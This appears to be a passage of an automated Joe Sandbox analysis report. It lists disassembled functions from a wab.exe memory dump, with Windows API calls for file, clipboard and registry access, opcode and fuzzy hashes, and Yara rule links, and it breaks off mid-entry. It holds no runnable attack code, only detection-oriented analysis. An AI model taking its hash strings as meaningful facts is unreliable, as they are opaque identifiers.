                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                      Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                      Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                      Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                      Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                      Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: EnumNamesResource
                      • String ID:
                      • API String ID: 3334572018-0
                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                      Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                      Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                      Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                      Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                      Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                      Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                      Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004095FC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                      • String ID:
                      • API String ID: 3655998216-0
                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                      Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00445426
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                      • String ID:
                      • API String ID: 1828521557-0
                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                      Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • memcpy.MSVCRT ref: 00406942
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@FilePointermemcpy
                      • String ID:
                      • API String ID: 609303285-0
                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                      Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID:
                      • API String ID: 2081463915-0
                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                      Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastRead
                      • String ID:
                      • API String ID: 2136311172-0
                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                      Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@
                      • String ID:
                      • API String ID: 1936579350-0
                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                      Non-executed Functions

                      Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • EmptyClipboard.USER32 ref: 004098EC
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • GlobalFix.KERNEL32(00000000), ref: 00409927
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • GetLastError.KERNEL32 ref: 0040995D
                      • CloseHandle.KERNEL32(?), ref: 00409969
                      • GetLastError.KERNEL32 ref: 00409974
                      • CloseClipboard.USER32 ref: 0040997D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                      • String ID:
                      • API String ID: 2565263379-0
                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                      Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMessageProc
                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                      • API String ID: 2780580303-317687271
                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                      Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • EmptyClipboard.USER32 ref: 00409882
                      • wcslen.MSVCRT ref: 0040988F
                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                      • GlobalFix.KERNEL32(00000000), ref: 004098AC
                      • memcpy.MSVCRT ref: 004098B5
                      • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                      • CloseClipboard.USER32 ref: 004098D7
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                      • String ID:
                      • API String ID: 2014503067-0
                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                      Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32 ref: 004182D7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                      • LocalFree.KERNEL32(?), ref: 00418342
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                      • String ID: OsError 0x%x (%u)
                      • API String ID: 403622227-2664311388
                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                      Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • OpenClipboard.USER32(?), ref: 00411878
                      • GetLastError.KERNEL32 ref: 0041188D
                      • DeleteFileW.KERNEL32(?), ref: 004118AC
                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                        • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                        • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                      • String ID:
                      • API String ID: 1203541146-0
                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                      Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID:
                      • API String ID: 1865533344-0
                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                      Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
